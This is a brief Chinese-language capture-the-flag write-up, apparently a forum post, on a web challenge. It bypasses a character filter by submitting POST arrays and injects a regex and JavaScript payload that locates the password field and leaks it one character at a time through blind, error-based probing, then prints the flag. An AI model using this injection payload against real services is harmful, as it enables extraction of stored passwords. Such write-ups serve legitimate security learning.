关键几点:
题目不允许post带有#()字符,通过构造数组可以绕过;它把post的变量名直接放正则了;
并不知道password的完整字段名,我是用(function(a){for(var k in a){if(k[0]=='p')return a[k]}})(this)过的;无论返回什么都会显示OK,但发生错误时没响应。
payload:
.*[0]=#reg#®[0]=] || 33<(function(a){for(var k in a){if(k[0]=='p')return a[k]}})(this)[0].charCodeAt() || asdasd || ([
(asdasd用来报错)
效果:
然后就是盲注了
Flag:flag{13fc892df79a86494792e14dcbef252a}
打赏还是打残,这是个问题
没有帐号? 立即注册